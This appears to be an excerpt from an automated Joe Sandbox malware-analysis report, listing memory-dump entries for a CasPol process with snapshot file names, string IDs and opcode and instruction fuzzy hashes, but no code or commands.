                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :@ r$:@ r
                                    • API String ID: 0-220078378
                                    • Opcode ID: 5c63e001a7e72b383a2b2090d48590edb69ce318688b65953b518b9d28e38b91
                                    • Instruction ID: 744792ff6308d9be0a1573f111492354a17f88a830acd38fd0b556f9adf58a48
                                    • Opcode Fuzzy Hash: 5c63e001a7e72b383a2b2090d48590edb69ce318688b65953b518b9d28e38b91
                                    • Instruction Fuzzy Hash: 2C512978F012189FDF54DBB8C55869E7BF6AF89245F108469E50AA7340EF389C81CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: L.Gr
                                    • API String ID: 0-3278281377
                                    • Opcode ID: f4b40b7dce96d4ba087d1777eb288d3179d86a92d84935ed22f173da452c5a54
                                    • Instruction ID: 1f88064fbb256530bf462a8956515a364e49b1bb70b2d6de95b87e199decc6a1
                                    • Opcode Fuzzy Hash: f4b40b7dce96d4ba087d1777eb288d3179d86a92d84935ed22f173da452c5a54
                                    • Instruction Fuzzy Hash: 53C1E234B002558FDB04AB78E854BAE7BF6AF89314F24456AE406DB391DA3CFC45CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4/Gr
                                    • API String ID: 0-1815050469
                                    • Opcode ID: 1efdcdb46b71df290677906211fc3b5972adb9c9aecc2039fbc5f98ae976e661
                                    • Instruction ID: 60577841e1ea318d67405c264e6861bef2f7a58e46b8d0643a53f48ca85c2e7e
                                    • Opcode Fuzzy Hash: 1efdcdb46b71df290677906211fc3b5972adb9c9aecc2039fbc5f98ae976e661
                                    • Instruction Fuzzy Hash: 9A81B335F012149BDB04DBB9C490AAEBBF2AFC8310F118429E506EB390DF34AD05CB96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :@ r
                                    • API String ID: 0-3855056555
                                    • Opcode ID: 0c2cb87bcc4fe90cb6bf342f56bc8fa974870aea13268f2d5ce7104599febdd6
                                    • Instruction ID: af3a37a68db0e89cc92ac1b6370794bb68ecfed633ac9a3b40d397de5fab7998
                                    • Opcode Fuzzy Hash: 0c2cb87bcc4fe90cb6bf342f56bc8fa974870aea13268f2d5ce7104599febdd6
                                    • Instruction Fuzzy Hash: E0713775B002189FCB44DFA8C484A9EFBF6BF88314F29C559E409AB355DB34ED428B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :@ r
                                    • API String ID: 0-3855056555
                                    • Opcode ID: 2f831e613d45f4cbc8eaa217441dc627fb784cc2ed96aa6c626c5724d183a7c5
                                    • Instruction ID: 47279d70b241d93b3a81551a570ff259589d419b85294af6f6d1b810168632b6
                                    • Opcode Fuzzy Hash: 2f831e613d45f4cbc8eaa217441dc627fb784cc2ed96aa6c626c5724d183a7c5
                                    • Instruction Fuzzy Hash: 1C7144305043A2CFC702EBB6C5DCB883F79BB41346F04865CD44956669EBB859C9CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: :@ r
                                    • API String ID: 0-3855056555
                                    • Opcode ID: b6c1cb525ecf7fc657d70406b9d9774171bf3ad3e29cf79dc887f1e04332ee3a
                                    • Instruction ID: ad1425b4c6419b0f2d683597473f21f44d780664da25fa8387d8ed87f20a8412
                                    • Opcode Fuzzy Hash: b6c1cb525ecf7fc657d70406b9d9774171bf3ad3e29cf79dc887f1e04332ee3a
                                    • Instruction Fuzzy Hash: BF4181747082828FD314EF29E984A1ABBE2FF85200F15C86AE58CDB355D738EC45CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: j
                                    • API String ID: 0-2137352139
                                    • Opcode ID: e5e6e5e5ee79cb1d593bab139bc0d9bc7ee33e1cf969858468466593f1d58f2d
                                    • Instruction ID: 46ba903ca2edcaa78b9e747379af95c9ec754c1ed9d7b09da5a5f3d6869519ae
                                    • Opcode Fuzzy Hash: e5e6e5e5ee79cb1d593bab139bc0d9bc7ee33e1cf969858468466593f1d58f2d
                                    • Instruction Fuzzy Hash: 70114839F002A45FDB60A7B8641439E7FE68F8A368F140564E90DDB381EE2D8D0383D2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ed990160d6eacc8408b48526fad3ce8fb77f00a9dc2fd90095a12a44c9b974dd
                                    • Instruction ID: 5dd5dc196f18d2d451fd4bb7867952695f6af69cbc5f73f79cec130a5de38bb6
                                    • Opcode Fuzzy Hash: ed990160d6eacc8408b48526fad3ce8fb77f00a9dc2fd90095a12a44c9b974dd
                                    • Instruction Fuzzy Hash: 95721874A002298FCB55DF29C894B9DBBB5BF88304F0486D9D50DAB345DB34AEC68F91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3ae00c78ed50236743748a92ce267c925b03c5a5796fbb4450414b3abe828b99
                                    • Instruction ID: 4c6d6347576f6abdaeea459b5fa72b589eccbf6035cd1170de88502a7a9e508d
                                    • Opcode Fuzzy Hash: 3ae00c78ed50236743748a92ce267c925b03c5a5796fbb4450414b3abe828b99
                                    • Instruction Fuzzy Hash: 6C721774A002298FCB55DF29C894B9DBBB5BF88304F0486D9D50DAB345DB34AEC68F91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9f245093dac18abe893d275b05d86d4834e576404e9b79b6748cef54dec8b793
                                    • Instruction ID: 18fb5061ba0902623870e4729f917c309b293295fda69928791d8c8c591676e1
                                    • Opcode Fuzzy Hash: 9f245093dac18abe893d275b05d86d4834e576404e9b79b6748cef54dec8b793
                                    • Instruction Fuzzy Hash: D2323B74A00246CFDB14EB68E198A9DBBB2FF49325F608469E405DB391DB3DEC81CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5d80075ba99ee7f97afb8d7829999ebddcc076d4240309f312284fa95fee798c
                                    • Instruction ID: bc50e73c2fc4fbdc274e8a35587f8eea05bd044eacb65004af11bcdc3b3a3be2
                                    • Opcode Fuzzy Hash: 5d80075ba99ee7f97afb8d7829999ebddcc076d4240309f312284fa95fee798c
                                    • Instruction Fuzzy Hash: 9632F058E4C2818DD72692A8459474C3FD29B9B31CF9FC2D7C0998FAE7C7758A878312
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9841b676c0eb5e7422a09e8328e33ceff0806dd3eb963866044af63faaea0b59
                                    • Instruction ID: 2f4f5a2dafab856b8d5b8a3054d27104054218a30f80e44708cb2eb478aa564d
                                    • Opcode Fuzzy Hash: 9841b676c0eb5e7422a09e8328e33ceff0806dd3eb963866044af63faaea0b59
                                    • Instruction Fuzzy Hash: E142BA79A012299FCB61DF29D988A99BBF5FF48310F1081E9E80DA3755EB355E81CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8dd1f5665fc2cdac95881e3d2ba953f6ca78c5d25ccc15b874c221fdddba5b74
                                    • Instruction ID: 0913c6a2d3192bfffb950ab709772ba91a28bc0947cff256191d673aa2e9d722
                                    • Opcode Fuzzy Hash: 8dd1f5665fc2cdac95881e3d2ba953f6ca78c5d25ccc15b874c221fdddba5b74
                                    • Instruction Fuzzy Hash: 1642AA79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E81CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 250800a9bc5572b13b26a851f028a778d9407ffeb82d9d337705ca0fc2c76789
                                    • Instruction ID: 9e8de901db59c8773ce3f5335e01e1486afeac02ba881ecb4f8a807ed8fff056
                                    • Opcode Fuzzy Hash: 250800a9bc5572b13b26a851f028a778d9407ffeb82d9d337705ca0fc2c76789
                                    • Instruction Fuzzy Hash: EB42AA79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 14d6aee1bd418a6a72fcd9e1f2bb5f6f743b2f17f79f34588d5c4d9242226050
                                    • Instruction ID: f45906a3dc6c0f8012c8b5adacac9b34fc925f3326994857610870392cae362c
                                    • Opcode Fuzzy Hash: 14d6aee1bd418a6a72fcd9e1f2bb5f6f743b2f17f79f34588d5c4d9242226050
                                    • Instruction Fuzzy Hash: D842A979A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2353f8ab1c70cfc5dd9b474abf12e5cb5c4e24dde0d0d9b7ce9523115701f6ec
                                    • Instruction ID: 0c8b9ad045c5b6368c22e66ce397195507a72b5ef17e03248f4abc956fe768af
                                    • Opcode Fuzzy Hash: 2353f8ab1c70cfc5dd9b474abf12e5cb5c4e24dde0d0d9b7ce9523115701f6ec
                                    • Instruction Fuzzy Hash: 0032AA79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 136fe992e84082ce40118be8b0fceb57d765f44d0eb4d288dbd7d50b558c4cc6
                                    • Instruction ID: d1970592d525ba8725b398c359d9fcce942fbb44f47a1619f93a4e207130f135
                                    • Opcode Fuzzy Hash: 136fe992e84082ce40118be8b0fceb57d765f44d0eb4d288dbd7d50b558c4cc6
                                    • Instruction Fuzzy Hash: 0932A979A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1bdee43e5f183ba9625cc58bd84cdaabecfdadf4c03d06c5e564eba009dba8ee
                                    • Instruction ID: 879d39f7f7547ca56284fc6fab855f997a5042b4d241c292489d7c503b677b2a
                                    • Opcode Fuzzy Hash: 1bdee43e5f183ba9625cc58bd84cdaabecfdadf4c03d06c5e564eba009dba8ee
                                    • Instruction Fuzzy Hash: 0732A979A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ab88fa2237f39ff8f492782d6b9fa9c1cfd91e8eea3c632489f4886fe85f44c0
                                    • Instruction ID: c2f36a1f55f889f38833bceacba0af3b798b6abd35f5f2a76e01eac30f0a6d8d
                                    • Opcode Fuzzy Hash: ab88fa2237f39ff8f492782d6b9fa9c1cfd91e8eea3c632489f4886fe85f44c0
                                    • Instruction Fuzzy Hash: 6432A879A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fd376f53b2197d8f4498126bf5b341f144cdaf85ea97d3b6d8e703268060b83
                                    • Instruction ID: c048f3d0bc320eb97f34b4b83f078019efd64b90be9ba7b14afd2e85e6f59a1d
                                    • Opcode Fuzzy Hash: 2fd376f53b2197d8f4498126bf5b341f144cdaf85ea97d3b6d8e703268060b83
                                    • Instruction Fuzzy Hash: CBF18134B002058FCB04EBB8D594BADB7F2AF88358F258569D409DB795EB38ED42CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3b92637509353d0f5d6bad1353d41e60247815b4d8d853e690aeffaf0991073d
                                    • Instruction ID: aa61725107ff09cc035c42843f76e980d4a1987ff596e0828c794b23d0980c9d
                                    • Opcode Fuzzy Hash: 3b92637509353d0f5d6bad1353d41e60247815b4d8d853e690aeffaf0991073d
                                    • Instruction Fuzzy Hash: 5022A879A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ce1517b046d08c7d3dcdd167799f9e04d656e99e076c762385e2756d54be645a
                                    • Instruction ID: b38c32b1b307d4464559fac1dfef25bfc3ed02a108a8ed17669943319af161d4
                                    • Opcode Fuzzy Hash: ce1517b046d08c7d3dcdd167799f9e04d656e99e076c762385e2756d54be645a
                                    • Instruction Fuzzy Hash: F322A879A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3225ba9c7e2d04e3eecfb51679244a74fb7c8caeece03c2d45dd2332b5abb54c
                                    • Instruction ID: 3296c16b478f8202ff7aa0d85aab08eed9979ecdc654985e41900b1aaa9ac577
                                    • Opcode Fuzzy Hash: 3225ba9c7e2d04e3eecfb51679244a74fb7c8caeece03c2d45dd2332b5abb54c
                                    • Instruction Fuzzy Hash: D822A979A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f53b8800b4ba7bebd0609d86ae035807c05eb429fec53ef090dc147a1b2823f8
                                    • Instruction ID: a3a000516d76cc72f71503749b445ff5b02541705f422e760a1d2c850fb2d7a8
                                    • Opcode Fuzzy Hash: f53b8800b4ba7bebd0609d86ae035807c05eb429fec53ef090dc147a1b2823f8
                                    • Instruction Fuzzy Hash: 1F22A979A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 896d56f43137514ff53874e43293a1dc85eedcec9d771093f733ed4153a36edc
                                    • Instruction ID: edd72106480595cb938ffd35589fb0eb8621b08e6a82cdb488578cf8237fcf19
                                    • Opcode Fuzzy Hash: 896d56f43137514ff53874e43293a1dc85eedcec9d771093f733ed4153a36edc
                                    • Instruction Fuzzy Hash: 5722A979A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f2c4b11b99a459409265697ed2f95ede0219c2f1b099e007062793d7694dba77
                                    • Instruction ID: 8ff6a81a5a2eb550ae33caec81944bb951e4d1587b9ab25c3a72258ea8dc41fc
                                    • Opcode Fuzzy Hash: f2c4b11b99a459409265697ed2f95ede0219c2f1b099e007062793d7694dba77
                                    • Instruction Fuzzy Hash: 63E13174A002158FCB14EF69E594A9DBBF2EF88351F248529E446DB390DB3DEC42CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 92f631d6510a946014e587ed00bf6b2fbe54b370e67da4fa33096053e0e04449
                                    • Instruction ID: c0fb83309f43b4710a000f2147927ebdd56bdd8bc2c9e487102df068385e228e
                                    • Opcode Fuzzy Hash: 92f631d6510a946014e587ed00bf6b2fbe54b370e67da4fa33096053e0e04449
                                    • Instruction Fuzzy Hash: 3D12AA79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2626506823cd636094b9eb67e129a93d78ca57a736254c714ea295b0cb206a74
                                    • Instruction ID: 55f30ee6fc0bddff8b069bbee19f1d226ec60adf6d44c50eb3c9308cedf7bf26
                                    • Opcode Fuzzy Hash: 2626506823cd636094b9eb67e129a93d78ca57a736254c714ea295b0cb206a74
                                    • Instruction Fuzzy Hash: 3812AB79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fff774629cce138d72b10cf94789233575abcc90d0969a7c90a1683e9a706814
                                    • Instruction ID: 6c94789924f9543281b08e022989172ba3356959ccb4c75725e078b88e0b93d0
                                    • Opcode Fuzzy Hash: fff774629cce138d72b10cf94789233575abcc90d0969a7c90a1683e9a706814
                                    • Instruction Fuzzy Hash: B512AB79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1cae77b1355e4da5a740a4dedfb537f3051ad1a6c1e194f9247177f9cb5336e9
                                    • Instruction ID: d48510fa044db2d6250d371820c7e63d14df4834a5f3fa33d168ac9b6a5c9f2c
                                    • Opcode Fuzzy Hash: 1cae77b1355e4da5a740a4dedfb537f3051ad1a6c1e194f9247177f9cb5336e9
                                    • Instruction Fuzzy Hash: 91129B79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 58e27ddc6e497277699d7acfbca1a1b27d614cfbeceac600842b1f7bae30acc0
                                    • Instruction ID: dbbedeff6157788546f7819e0b5b3cc93a18feaf9302c5facd3856e3cc2d53e6
                                    • Opcode Fuzzy Hash: 58e27ddc6e497277699d7acfbca1a1b27d614cfbeceac600842b1f7bae30acc0
                                    • Instruction Fuzzy Hash: 4ED18C74A003418FC714EF68E994A1ABBB2FF89714F108829E849CB755EB3CEC45CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7e816c0b61ed084afe96cc287ba059fda319ceabb8b19a33ecb0f7c4a04d21d1
                                    • Instruction ID: 386819339a6cbab4349a2cb7fdb3d6af3534b0d8ba0c2d758b9430244ea795bd
                                    • Opcode Fuzzy Hash: 7e816c0b61ed084afe96cc287ba059fda319ceabb8b19a33ecb0f7c4a04d21d1
                                    • Instruction Fuzzy Hash: C6029C79A012299FCB61DF29D984A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3aeca8f6a371e08fa0599aa13aef5de06c4f3f40077e095a20ad5d0e36e79efb
                                    • Instruction ID: 9d7c9dff6ee130dfa1616db54f700b3ae26516c8e3c9ed730cb87ec2c68bc747
                                    • Opcode Fuzzy Hash: 3aeca8f6a371e08fa0599aa13aef5de06c4f3f40077e095a20ad5d0e36e79efb
                                    • Instruction Fuzzy Hash: 58029C79A012299FCB62DF29D984A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b98ca3604ab6ac33d00069dd0d748cb7b8a12afe1d91c4fbcadfd46f5e1ec0c5
                                    • Instruction ID: 7f9a8e185a0e1ccfad29b4c2ad2f575e725297f59782b0a93e629647ba581e61
                                    • Opcode Fuzzy Hash: b98ca3604ab6ac33d00069dd0d748cb7b8a12afe1d91c4fbcadfd46f5e1ec0c5
                                    • Instruction Fuzzy Hash: 1D029C79A012299FCB61DF29D988A98BBF5FF48310F1081E9E80DA3755EB355E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
